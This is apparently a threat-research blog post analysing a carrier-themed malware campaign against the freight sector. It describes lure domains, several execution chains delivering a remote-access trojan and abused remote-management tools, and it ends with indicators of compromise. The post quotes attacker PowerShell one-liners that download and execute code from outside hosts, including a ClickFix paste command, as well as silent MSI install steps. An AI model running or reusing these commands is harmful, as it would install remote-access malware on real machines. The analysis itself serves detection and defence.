top of page
Search

Technical Analysis: Carrier-Themed Malware Campaign

Writer: FIND Threat Research
FIND Threat Research
Sep 24
10 min read

Updated: 7 days ago

This article is the technical companion to FIND’s high-level briefing. The briefing explains the campaign’s relevance to logistics, trucking, cargo theft and freight fraud; this article is intended for IT, cybersecurity and threat-intelligence specialists who need the underlying execution chains, infrastructure links, persistence artefacts and hunting opportunities.


Infrastructure discovery was supported by Have I Been Squatted (HIBS). We used the HIBS API to expand from known carrier-themed seed domains, surface lookalike registrations and enrich candidates before validating them against campaign-specific evidence.


Analysis of a carrier-themed delivery cluster found a malware repository and web infrastructure supporting several post-compromise branches rather than a single payload. Three execution chains converged on the Node.js variant of a remote-access trojan that FIND is naming GaloyanRAT. The DWM.EXE payload was identified as GaloyanRAT's native C++ variant. Other branches installed ScreenConnect, PulseWireX and MeshCentral; deployed a browser credential stealer; or delivered tunnelling, reverse-proxy and XMRig components.


Delivery infrastructure and lure design


The confirmed web cluster used carrier-themed names and impersonated logistics organisations. Example lures are shown below:


Figure 1 - Example carrier impersonation malware delivery page
Figure 1 - Example carrier impersonation malware delivery page
Figure 2 - Example carrier impersonation malware delivery page
Figure 2 - Example carrier impersonation malware delivery page

Seven domains had direct campaign-specific links, including shared Telegram telemetry, payload URLs, similar tracking scripts or direct cross-domain references. Six additional domains were assessed as high-confidence cluster members from a matching nameserver and registration pattern, although their payloads could not be recovered.


Domain

Registrar

Registration Date

carrier-contracts[.]com

Gransy, s.r.o.

2026-09-01

carrier-files[.]com

Gransy, s.r.o.

2026-09-01

carrierbrokercontracts[.]com

Gransy, s.r.o.

2026-09-09

carrierenrollupdate[.]com

Web Commerce Communications Limited / WebNic.cc

2026-09-15

carrieronlinefiles[.]com

Gransy, s.r.o.

2026-09-10

carrierpackbridge[.]com

GMO Internet Group / Onamae.com

2026-09-02

carrierreadydocs[.]com

NameCheap, Inc.

2026-08-06

carrierfilesonline[.]com

Gransy, s.r.o.

2026-09-09

carrierpackready[.]com

GMO Internet Group / Onamae.com

2026-09-02

carriersignpacket[.]com

GMO Internet Group / Onamae.com

2026-09-04

carrierspackethub[.]com

Gransy, s.r.o.

2026-09-07

carrierapproved[.]com

NameCheap, Inc.

2026-08-05


The carrier domains acted as the campaign’s front end. They displayed the impersonated carrier identity and presented a download as the expected packet or document. The malware itself was not always stored on the landing domain. Pages and tracking scripts frequently directed the user to a payload hosted on external infrastructure, principally the Google Cloud Storage bucket under storage.googleapis[.]com/gts-files-2026.


Several sites loaded /tracker.js. The script recorded visits and download activity through Telegram identifiers controlled by the campaign, then supplied or selected the payload link shown to the visitor.


  • carrierenrollupdate[.]com, for example, used its live tracker to direct users to _20260711_0cf.bat in the GCS bucket; that file subsequently installed the campaign’s ScreenConnect client.

  • carrierbrokercontracts[.]com and carrieronlinefiles[.]com used closely related tracker implementations, while carrier-contracts[.]com and carrier-files[.]com used an inline variant with a shared Telegram bot and recipient.

  • Other pages linked directly to named files. carrierreadydocs[.]com referenced PACWEST_FREIGHT_CARRIER_ONLINE_SETUP_2026.vbs in the same bucket. The separation between the lure domain and payload host allowed the operators to change a download without rebuilding the landing page, reuse the storage repository across multiple brands and monitor which lures generated activity.


Hunting for related infrastructure


The initial carrier domains were unlikely to represent the full operation. The naming pattern was broad rather than a simple misspelling of one brand: the actors repeatedly combined freight terms such as carrier, broker, contracts, enroll, files, online, packet, ready, registration and update.


We used the HIBS API as a candidate-generation and enrichment layer. Using the two functions allowed us to perform infrastructure discovery.


  • Squat - API call to generate and analyse typosquatted permutations

  • Analyse - Enrich identified domain with DNS, registration, certificate and web signals


The workflow was:


  1. Seed HIBS with confirmed carrier-themed domains and search for related permutations and naming patterns.

  2. Collect candidate domains and enrichment rather than treating an automated score as a verdict.

  3. Compare registration dates, registrars, nameservers, DNS records, certificates, HTTP responses and page characteristics.

  4. Retrieve only the root page and /tracker.js without executing site JavaScript.

  5. Look for campaign-specific links: shared Telegram bot or chat identifiers, matching tracker code, Google Cloud Storage payload URLs, direct cross-domain references and links to recovered malware.

  6. Separate confirmed infrastructure from lookalikes, parked domains and unrelated freight websites.


This process produced a 25-domain working set for validation. Seven domains were directly confirmed through payload, tracking or cross-domain evidence. Six were assessed as high-confidence members of the same cluster because they shared the distinctive nameserver and registration pattern. One was retained as a probable adjacent asset. Two formed a separate MCS-150-themed cluster, four remained suspicious but unconfirmed, and five were unlinked.


GaloyanRAT


The carrier-themed delivery infrastructure, including several carrier* domains, led to three distinct GaloyanRAT execution chains. Two used a NodeRemote installer reached through process hollowing; the third used ClickFix and GitHub-hosted stages.


Figure 3 - GaloyanRAT Node.js variant execution chains
Figure 3 - GaloyanRAT Node.js variant execution chains

Capabilities


Both GaloyanRAT implementations provide an operator with broad remote access to an infected system. Observed capabilities include:


  • executing commands and opening an interactive terminal;

  • viewing and controlling the desktop, including mouse and keyboard input;

  • reading and changing clipboard content;

  • uploading, downloading and managing files;

  • listing and terminating processes;

  • collecting host, software and browser information;

  • identifying installed cryptocurrency-wallet extensions;

  • downloading and installing additional executable or MSI payloads;

  • communicating through TCP or WebSocket, with the native C++ variant also supporting UDP;

  • operating through scheduled tasks in the Node.js variant or a Windows service in the native C++ variant;

  • displaying a fake security-update screen and restricting local interaction through the C++ variant's privacy mode; and

  • creating a less-visible, operator-controlled desktop through the C++ variant's hidden-desktop capability.


The recovered web frontend was consistent with an operator console for these capabilities, exposing remote-command, terminal, desktop, file, process, payload-builder and stolen-data interfaces. This supports the malicious-use assessment but does not establish an operator identity or victim count.


Delivery and persistence


What is NodeRemote? NodeRemote is the name used by the recovered .NET installer and its embedded artefacts, including scheduled-task names such as `NodeRemote{...}` and `NodeRemote-XmlTest`. It is not the RAT itself. Its role was to prepare the victim system by installing a local Node.js runtime, downloading GaloyanRAT's main.js, writing the VBS launcher and configuration files, and creating scheduled-task persistence.


Chain 1: Small VBS/WSF → Worker → NodeRemote → GaloyanRAT


Hundreds of small carrier-themed VBS and WSF files launched hidden PowerShell and retrieved a stage from campaign-specific workers[.]dev hosts. Some evaluated the response directly in memory; others briefly wrote it to %TEMP% before execution and deletion.


powershell -ep bypass -c "$script = [scriptblock]::Create((irm test.adriance.workers.dev)); & $script -id 'mUt1002ker'"

Nine live Workers decoded to the same .NET loader, which hollowed CasPol.exe and ran a NodeRemote installer. The installer downloaded Node.js 20.11.0 and GaloyanRAT's main.js, then created a logon/hourly scheduled task:


C:\Windows\System32\wscript.exe //nologo "C:\ProgramData\WebServer-<COMPUTERNAME>\nodeupdate.vbs"

Persistence was established with scheduled tasks that start with "NodeRemote".


schtasks.exe /Create /F /TN "NodeRemote{<USER-DERIVED-GUID>}" /XML "C:\ProgramData\WebServer-<COMPUTERNAME>\nodetask.xml"

schtasks.exe /Run /TN "NodeRemote{<USER-DERIVED-GUID>}"

Chain 2: Embedded-array VBS → CasPol.exe hollowing → GaloyanRAT


Larger VBS files rebuilt an embedded PowerShell loader from numeric arrays. PowerShell decoded a Base85 PE and created suspended C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe through CreateProcessA


The loader then replaced its memory with a NodeRemote installer. Because the process was created through an API call, there was no intermediate shell command. When arguments were present, the target command line was:


Chain 3: ClickFix → GitHub stages → GaloyanRAT


README.js displayed a fake human-verification prompt and copied the following command for the victim to paste into the Windows Run dialog:


powershell -c "irm https://raw.githubusercontent.com/1CodeDev-hub/electronAI/refs/heads/main/basic.txt|iex; exit"

The GitHub stages created %LOCALAPPDATA%\TryNodeUpdate, downloaded blockchain.js and Node.js 20.11.0, and registered TryNodeUpdateTask to run immediately, at logon and hourly.


Chain 4: Custom.vhdx → native C++ GaloyanRAT variant


Custom.vhdx contained DWM.EXE, the native C++ GaloyanRAT variant, and external_key_decryptor_json.exe, a utility capable of decrypting Chrome and Edge browser data.


Figure 4 - C++ GaloyanRAT variant installation
Figure 4 - C++ GaloyanRAT variant installation

Once launched with sufficient privileges, the C++ variant could install itself as the DesktopControlManager service, displayed as Desktop Windows Manager, and start an interactive-session child for desktop control.

Persistence across the four chains


  • Chain 1 & 2

    • Installation: C:\ProgramData\WebServer-<COMPUTERNAME>

    • Scheduled Task Names:

      • NodeRemote{...}

      • NodeRemote-XmlTest

      • WebServer-*


  • Chain 3:

    • Installation: %LOCALAPPDATA%\TryNodeUpdate

    • Scheduled Task: TryNodeUpdateTask


  • Chain 4:

    • Installation: C:\Users\Public\DWM.EXE

    • Service Name: DesktopControlManager


GaloyanRAT Analysis


C2 analysis


GaloyanRAT first retrieved hexadecimal ciphertext from:


hxxps://gist.githubusercontent[.]com/wservices66-maker/53ba3186cf8ec0cada46fc1ccb4a0ec7/raw/apiKey


It decrypted that content with AES-128-ECB using ErjanikGaloyan$$, removed PKCS#7 padding and parsed a JSON urls array. If the Gist path failed, the client queried BNB contract 0xCc4BCd51e0eA7E254b0F30044538F6Cb86a4E61b through public RPC services for replacement discovery data:


Figure 5 - BNBscan transactions for 0xCc4BCd51e0eA7E254b0F30044538F6Cb86a4E61b 
Figure 5 - BNBscan transactions for 0xCc4BCd51e0eA7E254b0F30044538F6Cb86a4E61b 

The selected backend returned relay records rather than acting as a single fixed C2. Four responsive backends returned the same five raw-TCP relay addresses at collection time:


  • 89.117.109[.]140:46149

  • 84.200.87[.]236:62790

  • 167.148.201[.]35:49863

  • 167.148.201[.]183:49782

  • 206.206.127[.]94:44255


This separation of encrypted discovery data, replaceable backends and relay nodes gave the operators several points at which infrastructure could be rotated without rebuilding the implant.


The decrypted configuration history contained the below C2s:

find.beta-into[.]space
cdn.beta-into[.]space
cdn.vooi-app[.]xyz
api.vooi-app[.]xyz
amc-us.mprevive[.]com
do.opinionvip[.]club

The last three appeared across all recovered Gist revisions, while the beta-into, vooi-app, Worker and ngrok entries rotated.


The public frontend recovered from cdn.beta-into[.]space matched GaloyanRAT's endpoint capabilities and provided an infrastructure-level link to its operator console. The wservices66-maker GitHub account also hosted NodeRemote installer material and the encrypted configuration Gist:


Figure 6 - RAT panel
Figure 6 - RAT panel

The native DWM.EXE RAT recovered from Custom.vhdx used the same Gist and used the same AES key from the string ErjanikGaloyan$$`. Further protocol analysis found the same registration schema, JSON packet vocabulary, raw-TCP framing and relay retry model. FIND therefore assesses DWM.EXE as the native C++ variant of the GaloyanRAT family.


Shared C2 Protocol


The DWM.EXE binary and the Node.js GaloyanRAT both retrieve it's configuration from the Gist, decrypting using the same string & resolving the same C2 domains.


Both implementations serialize the same packet model as UTF-8 JSON, use the same register, registered, ping and pong control flow, submit the same host-registration fields and frame raw TCP messages with a four-byte big-endian length. Both also rotate relay candidates using the same phased retry pattern. DWM identifies itself with cpp-tcp, cpp-wss or cpp-udp, while the Node.js client uses node-tcp or node-wss. These implementation-specific labels within an otherwise shared protocol indicate that the backend was designed to support both clients.


Attribute

DWM.EXE variant

Node.js variant

Configuration location

Same raw wservices66-maker Gist

Same raw wservices66-maker Gist

Decryption material

AES-128-ECB key ErjanikGaloyan$$

AES-128-ECB key ErjanikGaloyan$$

Discovery model

Encrypted configuration, relay discovery and cached relay data

Encrypted configuration used to obtain live endpoints

Packet protocol

JSON packets, four-byte big-endian TCP framing, common control messages

Same JSON packets, TCP framing and control messages

Registration marker

cpp-tcp, cpp-wss or cpp-udp

node-tcp or node-wss

Implementation

Native C++ service and interactive-session child

Bundled Node.js application with scheduled-task persistence


FIND assesses the Node.js and native C++ samples as two variants of the GaloyanRAT family. The Node.js variant provides the portable client delivered through the three execution chains described above; the DWM.EXE variant provides a native Windows implementation with service-based operation, interactive-session process creation and UDP transport. Their shared wire protocol, registration model, discovery configuration and backend design establish the family relationship despite the different programming languages and persistence models.


ScreenConnect installation


Figure 7 - ScreenConnect installation
Figure 7 - ScreenConnect installation

carrierenrollupdate[.]com impersonated GlobalTranz Enterprises and loaded /tracker.js. The tracker recorded visitor and download telemetry through Telegram and selected a payload.


Figure 8 - tracker.js interaction logging with Telegram bot
Figure 8 - tracker.js interaction logging with Telegram bot

The observed route downloaded _20260711_0cf.bat from the gts-files-2026 bucket. The BAT relaunched itself with an install argument in a hidden window and downloaded a ScreenConnect MSI using BITS with PowerShell/.NET fallbacks. It then invoked `msiexec` silently and deleted the local MSI copy.


The BAT assembled the download URL as hXXps[:]//screen-connect[.]ink/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest and stored the result as %TEMP%\%RANDOM%.msi.


This installed a ScreenConnect server configured to communicate with screen-connect[.]ink:


  • Service Name: ScreenConnect Client (8399eafe781eb473)

  • Screenconnect Server: relay-85768.screen-connect[.]ink:8443


PulseWireX and ScreenConnect orchestrators


Three PowerShell orchestrators installed both PulseWireX and ScreenConnect and verified the resulting services, creating redundant remote-access paths.


The orchestrator downloaded each package and silently installed it with msiexec:


Invoke-WebRequest -Uri $Url -OutFile $outFile -UseBasicParsing -ErrorAction Stop

Start-Process -FilePath "msiexec.exe" -ArgumentList "/i `"$outFile`" /qn /norestart" -Wait -PassThru -NoNewWindow

  • Installation: C:\Program Files\PulseWireX (<instance>)

  • Service PulseWireX-<instance>


MeshCentral execution chain


The recovered Mesh agent installed as a persistent Windows service and connected to mcentrals[.]com. As with ScreenConnect, the product can be used legitimately; its deceptive delivery context made this deployment suspicious.


Tunnelling, reverse-proxy and mining execution chain


multiplatform.exe supported Cloudflare Tunnel, Pinggy, localtunnel and WebSocket transports. It could install an automatic service, accept an instance name through --service-guid and launch in a LocalSystem session.


Three Go binaries identified themselves as reverseproxy/cmd/agent and used yamux. Their server address was not recovered statically.


The XMRig launcher referenced mining pools pool.supportxmr[.]com:443 and xmrpool[.]eu:9999.


References


On July 14th on X, @malwrhunterteam shared the "Remote Support Panel" we saw on our campaign linked to GaloyanRAT. Later that day, @smica83 reposted a linked payload, ITF_LOGISITICS_GROUP_ONLINE_CARRIER_INVITATION.vbs.


Figure 9 - @smica83 retweet of linked sample
Figure 9 - @smica83 retweet of linked sample

Additional related samples were shared on the 24th July:


Figure 9 - @smica83 retweet of linked sample
Figure 9 - @smica83 retweet of linked sample

@skocherhan identified the Github account linked to this campagin:


Figure 9 - @skocherhan retweet of linked Github
Figure 9 - @skocherhan retweet of linked Github

Indicators of Compromise


Initial Delivery and Carrier impersonation


Indicator

Assessment

Context

carrier-contracts[.]com

Confirmed

Kalerx Transport lure linked to test.adriance.workers[.]dev and the NodeRemote/GaloyanRAT chain.

carrier-files[.]com

Confirmed

Off Top Xpress document lure; the listed WSF remained access-controlled.

carrierbrokercontracts[.]com

Confirmed

Larkin Express Logistics lure linked to a Worker loader and directly cross-linked to carrierpackbridge[.]com

carrierenrollupdate[.]com

Confirmed

GlobalTranz lure whose live /tracker.js delivered the ScreenConnect BAT from GCS.

carrierpackbridge[.]com

Confirmed

Carrier-document landing page sharing the campaign's tracker and Telegram telemetry.

carrierreadydocs[.]com

Confirmed

Directly referenced by another confirmed landing page and linked through the campaign infrastructure pattern.

carrierfilesonline[.]com

High-confidence suspected

PACWEST Freight lure that referenced a carrier-themed VBS in the campaign bucket.

carrierpackready[.]com

High-confidence suspected

Same validated registration and infrastructure cluster; payload not recovered.

carriersignpacket[.]com

High-confidence suspected

Same validated registration and infrastructure cluster; payload not recovered.

carrierspackethub[.]com

High-confidence suspected

Same validated registration and infrastructure cluster; payload not recovered.

carrierapproved[.]com

Probable adjacent asset

Related registration and nameserver pattern; payload unresolved.

storage.googleapis[.]com/gts-files-2026

Payload repository

Campaign bucket prefix used for scripts, executables, MSIs and disk-image delivery.


C2, RMM & Staging Infra


Indicator

Type

Context

*.workers[.]dev

Domain pattern

Multiple live PowerShell/process-hollowing stage hosted

cdn.beta-into[.]space

Domain

GaloyanRAT discovery backend and observed operator-panel host.

cdn.vooi-app[.]xyz

Domain

GaloyanRAT discovery and payload host.

relay-85768.screen-connect[.]ink:8443

domain:port

ScreenConnect relay endpoint embedded in the delivered MSI.

mcentrals[.]com:443

domain:port

MeshCentral remote-access endpoint embedded in the recovered agent.

89.117.109[.]140:46149

IP:port

GaloyanRAT raw-TCP relay returned by live discovery.

84.200.87[.]236:62790

IP:port

GaloyanRAT raw-TCP relay returned by live discovery.

167.148.201[.]35:49863

IP:port

GaloyanRAT raw-TCP relay returned by live discovery.

167.148.201[.]183:49782

IP:port

GaloyanRAT raw-TCP relay returned by live discovery.

206.206.127[.]94:44255

IP:port

GaloyanRAT raw-TCP relay returned by live discovery.

File

Artifact

SHA256

Kalerx carrier-themed VBS

a666bf66ab893e55c1dfdf3c55a948cd5c9689c77072f2babb2ed9f00339c806

Common Worker-decoded .NET loader

0e274d152b214417395069999d947b9fb0a5aee58e3f35479099269b43b518e7

Representative embedded-array VBS

a568b2937942fb8e746e5a7d67f34bf80d556335dffda969b8e7d5402ef2cf41

NodeRemote installer

cb5d9e2e81c3b8bff3caa0b21fc947423d542f3e49d140d08306207e2d3d4bb0

NodeRemote installer

0814bde11e8f9d7023a990b8e08efec713c27cea6abb72021e4c2c59002ccd2b

NodeRemote installer

43f8a0b151b204fa9f23ebd6b0f881ee2f5f15f249c215e437e9b66b6a39ce0a

ClickFix README.js

27e2b8f32d2310546e7b3cc552cce5f0cc8bea19f936ba1583e63db9e3765b35

GaloyanRAT main.js

6caea085346e7966e09acc39aa7f0be62be5814dc53963031c85613ea4376822

ScreenConnect delivery BAT

c8d6745073acc27c7233ab029651cb2a506c935259331a5516fa650a7e0e1a43

ScreenConnect MSI from live chain

b3fdca3f37a4b27261e45130cf731a85d5a1c4933d03eb6607340b0f3429317f

Recovered ScreenConnect MSI

b21bf61ee8879b136aa953b0d90e09e683305a8360233602a5c0c3eb7a378e2cb3fdca3f37a4b27261e45130cf731a85d5a1c4933d03eb6607340b0f3429317f

Recovered ScreenConnect MSI

dc0a3393c4169882975ee5bc5b5a0e3336d224b919fdf7aa4d8fb4b0a3a422f6

Recovered ScreenConnect MSI

e6e635b738b0a00d6b047ee8e6167a9b0846e9e83837c34e7872298999b47bc9

Recovered ScreenConnect MSI

f9163b7f1335d1a496cc0309a0da381d5852be57586621990d75233483f8aac9

Custom.vhdx

b0266736e86f2185af4fa97d56e3e25463becc039fa58544122adff0c0a0cdb4

Browser credential stealer

0f18adc87ca5b66e9fa2a4612a1f2710d683d2a3919f23e14f55ee0568fbda45

Native C++ GaloyanRAT (DWM.EXE)

ef0bb069aa8435bd6ec74464c7a91d54aa00e61615171ef4ef821777b3dbd9ba

PulseWireX/ScreenConnect orchestrator

7fe836b942660235f90b7bb1698110c7e8ea827c8556590c0077d2f52b25433a

PulseWireX/ScreenConnect orchestrator

afcf9922bcd75e39472756cee61ce7ad729672094cb387fb8906457e261a3be4

PulseWireX/ScreenConnect orchestrator

b48a472be4e87af47508636e642718fb35f2bba771659466869305d65d1d21cf

PulseWireX db22d802 MSI

c5610933bb4a987f8a87f08969e788c269e1a5e9868caa1c5f9fa39b77d1fa2d

PulseWireX bambargia MSI

ee640a7485016aec8b7ea8714d209bc7783ab02c638974b0ff3c2d59cb822af8

PulseWireX `owners789` MSI

ab6007f7ad4fc0cc0159ec6353f8b02fd73ff1df98bce1194b26d10db006978a

PulseWireX skftjl MSI

a8446addc96fc0dad897991c20be4ac9fa9d2b3448db999226041f08beaba7f9

PulseWireX nextjs2385 MSI

14551e863ec2ffc76e1a2c14c0b68e77672f986d40b5131e8ce2580183491b5c

MeshCentral agent

93228a0438821147f78aaba149ba6195543270e9ea8ba27d14291f60ad170545

Tunnelling component

4661e606c7ed80723d115d9ff8c1577a6c08e3372c6b702e2a1847d8dab5cdc7

Reverse-proxy agent

0c7c61be125d94b828e9f7fc846c1059ff6a50cb803c7c03234ac9f65efedf48

Reverse-proxy agent

3d330a2f1c9c082bc5932ef0cc3822339519f4f7ab0796968eb2aa3a22de29bd

Reverse-proxy agent

5c9dd7f29811897cb4ed60039f865238e80839363b9305edac86a8e372c6771a

XMRig launcher

8ccc33031ac652ca3f188f9a9818bcd5d32c785233e22ea2107e1cefc0ee2a6b

Misc


Indicator

Type

Context

ScreenConnect Client (8399eafe781eb473)

Service

Persistent service installed by the observed ScreenConnect MSI.

DesktopControlManager

Service

Service name used by the custom DWM RAT.

TryNodeUpdateTask

Scheduled Task

ClickFix/GitHub GaloyanRAT persistence.

NodeRemote-XmlTest

Scheduled Task

NodeRemote scheduled-task artefact.

gist.githubusercontent[.]com/wservices66-maker/53ba3186cf8ec0cada46fc1ccb4a0ec7/raw/apiKey

URL

Encrypted GaloyanRAT discovery configuration.

0xCc4BCd51e0eA7E254b0F30044538F6Cb86a4E61b

BNB contract

GaloyanRAT fallback discovery mechanism.

ErjanikGaloyan$$

String

AES-128-ECB configuration key and useful code-family hunting string;


 
 
 

Recent Posts

See All

Comments


Commenting on this post isn't available anymore. Contact the site owner for more info.

Freight-Intel Network & Defense

P.O. Box #416 

Huntington Beach CA 92648
Phone: 847-212-0537
Email:find@freight-intel.com

A License Number - A 3500213

Copyright © 2025  FREIGHT-INTEL NETWORK & DEFENSE

bottom of page